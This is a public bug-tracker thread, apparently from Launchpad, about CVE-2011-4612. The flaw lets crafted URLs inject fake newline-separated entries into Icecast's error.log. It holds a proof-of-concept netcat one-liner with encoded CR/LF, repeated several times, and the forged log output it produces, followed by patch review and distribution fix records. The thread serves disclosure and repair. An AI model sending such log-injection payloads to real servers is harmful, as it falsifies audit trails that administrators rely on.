Newline injection in error.log

Bug #894782 reported by Moritz Naumann on 2011-11-25
268
This bug affects 2 people
Affects Status Importance Assigned to Milestone
Icecast
Fix Released
Unknown
Gentoo Linux
Fix Released
Low
openSUSE
Fix Released
Low
icecast2 (Fedora)
Invalid
Unknown
icecast2 (Ubuntu)
Low
Zubin Mithra

Bug Description

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/ (/usr/share/icecast2/web/non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/)
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/" No such file or directory

As you can see above, this allows for falsifying the log file, by adding custom messages. Apparently input validation is insufficient and URL encoded newlines (%0d%0a) are expanded to actual newlines in the log file.

ProblemType: Bug
DistroRelease: Ubuntu 11.10
Package: icecast2 2.3.2-6ubuntu2
ProcVersionSignature: Ubuntu 3.0.0-13.22-generic 3.0.6
Uname: Linux 3.0.0-13-generic x86_64
ApportVersion: 1.23-0ubuntu4
Architecture: amd64
Date: Fri Nov 25 15:38:59 2011
InstallationMedia: Ubuntu 10.10 "Maverick Meerkat" - Release amd64 (20101007)
ProcEnviron:
 PATH=(custom, no user)
 LANG=de_DE.UTF-8
 SHELL=/bin/bash
SourcePackage: icecast2
UpgradeStatus: Upgraded to oneiric on 2011-10-21 (35 days ago)
mtime.conffile..etc.default.icecast2: 2011-11-25T15:30:37.746273

CVE References

Moritz Naumann (mnaumann) wrote :
visibility: private → public
Changed in icecast2 (Ubuntu):
status: New → Confirmed
Jamie Strandboge (jdstrand) wrote :

Thank you for using Ubuntu and reporting a bug. Because icecast is in universe and community supported, this issue has been forwarded to upstream and oss-security:
http://www.openwall.com/lists/oss-security/2011/12/15/4

Changed in icecast2 (Ubuntu):
importance: Undecided → Low

Jamie Strandboge <email address hidden> reported to icecast developers (CCing <email address hidden>) about possibility to inject fake message into icecast error log by specially crafted HTTP request sent to icecast server port discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815

Upstream responded fixing 2.3.3 version would be released soon.

Thanks for the bug, Petr.

Jamie Strandboge (jdstrand) wrote :

This is CVE-2011-4612

I was able to reproduce the fake log file with the same info as referenced here:
https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782

netcat must be installed of course

Your friendly security team received the following report via oss-security.
Please respond ASAP.
The issue is public.

CVE-2011-4612

It was found that remote users could inject newlines in the error.log of icecast, therefore forging log entries

Citing https://launchpad.net/bugs/894782:

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

bugbot adjusting priority

Zubin Mithra (zubin-mithra) wrote :

Please find attached, a debdiff that patches the issue by trimming at occurances of "\r" or "\n". Tested on lenny. After applying the, you have :-

$ echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null
Connection to 127.0.0.1 8000 port [tcp/*] succeeded!
$ cat /var/log/icecast2/error.log
[2012-02-20 19:32:34] INFO main/main Icecast 2.3.2 server started[2012-02-20 19:32:34] INFO connection/get_ssl_certificate No SSL capability
[2012-02-20 19:32:34] INFO stats/_stats_thread stats thread started
[2012-02-20 19:32:34] INFO yp/yp_update_thread YP update thread started
[2012-02-20 19:32:34] INFO fserve/fserv_thread_function file serving thread started
[2012-02-20 19:33:23] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory (/usr/share/icecast2/web/non-existent" No such file or directory)
[2012-02-20 19:33:23] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/non-existent" No such file or directory" No such file or directory

The attachment "icecast2_2.3.2-5ubuntu2.debdiff" of this bug report has been identified as being a patch in the form of a debdiff. The ubuntu-sponsors team has been subscribed to the bug report so that they can review and hopefully sponsor the debdiff. In the event that this is in fact not a patch you can resolve this situation by removing the tag 'patch' from the bug report and editing the attachment so that it is not flagged as a patch. Additionally, if you are member of the ubuntu-sponsors team please also unsubscribe the team from this bug report.

[This is an automated message performed by a Launchpad user owned by Brian Murray. Please contact him regarding any issues with the action taken in this bug report.]

tags: added: patch
Zubin Mithra (zubin-mithra) wrote :

Please find attached a new debdiff which replaces \r and \n with '_', rather than trim the string.

Steve Beattie (sbeattie) wrote :

Zubin, thanks for updating your patch. I see a couple of issues with your patch:

  - the filter loop quits when \0 is reached at the end of the existing path, but never writes \0 to the end of the filtered string. Any attempts to read the filtered string will run off the end of the malloc(3)ed memory and read what ever memory contents happen to be adjacent to it. It may cause the daemon to crash if it hits an unmapped page.

  - the result of strlen(3) is used to calculate the amount of memory to malloc(3) for the filtered string, but strlen(3) reports the length of the string not including the trailing \0. So the allocated array will not have enough room for you to write the trailing \0 once you do so.

Please address these issues and test your fix once you've done so to verify that you've addressed the issue, as well as consider submitting your patch to the upstream icecast project; poking around their svn tree(http://www.icecast.org/svn.php) , it appears this issue is still unfixed there as well.

Steve Beattie (sbeattie) wrote :

Oh, sorry, a couple of other comments:

 - the icecast2 package uses quilt to manage patches, please add your fix to the series of patches there (the Quilt for Debian Maintainers page http://pkg-perl.alioth.debian.org/howto/quilt.html gives more information on how to do that).
 - maverick (Ubuntu 10.10) has the same version of icecast in it; we'll need to update both at the same time or the maverick version will be less than the version in lucid-updates.
 - with that, the version should be 2.3.2-5ubuntu1.10.04.1 (and 2.3.2-5ubuntu1.10.10.1for maverick-security) not 2.3.2-5ubuntu2; if we weren't updating maverick, the correct version would be 2.3.2-5ubuntu1.1. See https://wiki.ubuntu.com/SecurityTeam/UpdatePreparation#Update_the_packaging on using correct versioning to avoid possible conflicts.

Thanks again.

Zubin Mithra (zubin-mithra) wrote :

Hi Steve,

I've corrected the above mentioned issues; please find attached a patch for lucid; I'll attach a patch for maverick and pass it over upstream asap.

Cheers!

Zubin Mithra (zubin-mithra) wrote :

Hi,

I've attached the patch for maverick along.

Jamie Strandboge (jdstrand) wrote :

Zubin, thank you for your work on these patches. Unfortunately, they are still being patched directly, rather than using the quilt patches system (notice the debian/patches directory-- your patch should be in this directory). As mentioned, please see http://pkg-perl.alioth.debian.org/howto/quilt.html for more information.

Additionally, the patches do not contain DEP-3 comments. These are required for patch attribution, origin, extended description, bugs, etc. Has this patch been forwarded upstream? Does it come from an upstream commit? Has it been reviewed by upstream? This information should be captured in the DEP-3 comments (see http://dep.debian.net/deps/dep3/ for details).

Unsubscribing ubuntu-security-sponsors for now. Please make these adjustments and resubscribe. Thanks again.

Changed in icecast2 (Ubuntu):
status: Confirmed → In Progress
assignee: nobody → Zubin Mithra (zubin-mithra)

The fixed packages for 11.4, 12.1 and FACTORY are submitted via SRID 108146, 108145 and 108151, respectively.

This is an autogenerated message for OBS integration:
This bug (737255) was mentioned in
https://build.opensuse.org/request/show/108145 12.1 / icecast
https://build.opensuse.org/request/show/108146 11.4 / icecast
https://build.opensuse.org/request/show/108151 Factory / icecast

The SWAMPID for this issue is 45905.
This issue was rated as low.
Please submit fixed packages until 2012-04-03.
When done, please reassign the bug to <email address hidden>.
Patchinfo will be handled by security team.

Update released for: icecast, icecast-debuginfo, icecast-debugsource
Products:
openSUSE 11.4 (debug, i586, x86_64)

all released

Gary M (garym) wrote :

xiph.org have just announced version 2.3.3, which includes a fix for CVE-2011-4612 : http://lists.xiph.org/pipermail/icecast/2012-June/012217.html

Changed in opensuse:
importance: Unknown → Low
status: Unknown → Fix Released
Changed in icecast:
status: Unknown → New

Any news? Because 2.3.3 is released.

The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines
This is part of the patch-set addressing CVE-2011-4612.

Changed in gentoo:
importance: Unknown → Low

2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.

(In reply to comment #5)
> 2.3.3 now in portage. I can only do a limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
=net-misc/icecast-2.3.3
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"

I stumbled upon bug 430434.

x86 done, thanks!

ppc done

amd64 done

Changed in icecast:
status: New → Fix Released

alpha/sparc keywords dropped

+ 18 Sep 2012; Kacper Kowalik <email address hidden> icecast-2.3.3.ebuild:
+ ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit
+ RDEPEND

ppc64 stable, last arch done

Thanks, everyone.

GLSA vote: no.

Thanks, folks. GLSA Vote: No, tool, closing.

Changed in gentoo:
status: Unknown → Fix Released
Changed in icecast2 (Ubuntu):
status: In Progress → Incomplete

Debian has 2.3.3 http://packages.debian.org/source/unstable/icecast2 - how about updating the ubuntu package based on that?

After all the release fixes 3 security issues (out of which probably 2 apply to the default ubuntu package).

CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612):
  icecast before 2.3.3 allows remote attackers to inject control characters
  such as newlines into the error loc (error.log) via a crafted URL.

Changed in icecast2 (Ubuntu):
status: Incomplete → Confirmed
status: Confirmed → Incomplete
Jamie Strandboge (jdstrand) wrote :

We are closing this bug report because it lacks the information we need to investigate the problem, as described in the previous comments. Please reopen it if you can give us the missing information, and don't hesitate to submit bug reports in the future. To reopen the bug report you can click on the current status, under the Status column, and change the Status back to 'New'. Thanks again!

Changed in icecast2 (Ubuntu):
status: Incomplete → Invalid
Changed in icecast2 (Fedora):
status: Unknown → Invalid
Jamie Strandboge (jdstrand) wrote :

Actually, Ubuntu 13.04 has the fix as part of 2.3.3-1ubuntu1:
icecast2 (2.3.3-1ubuntu1) raring; urgency=low

  * Merge from debian unstable, remaining changes:
    - 1004_fix_xmlCleanupParser_splatter.patch: Make sure that
      xmlCleanupParser() is only called once: on exit. Doing otherwise
      potentially results in Bad Things (e.g., crashes that point
      incorrectly to PulseAudio).

 -- Lorenzo De Liso <email address hidden> Tue, 04 Dec 2012 16:08:48 +0100

icecast2 (2.3.3-1) unstable; urgency=low

  [ upstream ]
  * New upstream bugfix release.
    + Allow the source password to be undefined. This is to avoid
      falling back to a default password which would be a security
      problem. Fixing #1846
    + Applied justdave's patches, fixing #1717 and #1718. HTTPS now with
      better security and support for chained certificates.
    + trunk/icecast/conf/icecast_minimal.xml.in: Updated <alias> to use
      destination="" not dest="". The old dest="" attribute is still
      supported.
    + Added 'admin' and 'location' to default config, thus fixing #1839.
    + Added VCLT playlist support.
    Closes: bug#652663, which fixes CVE-2011-4612.

Changed in icecast2 (Ubuntu):
status: Invalid → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.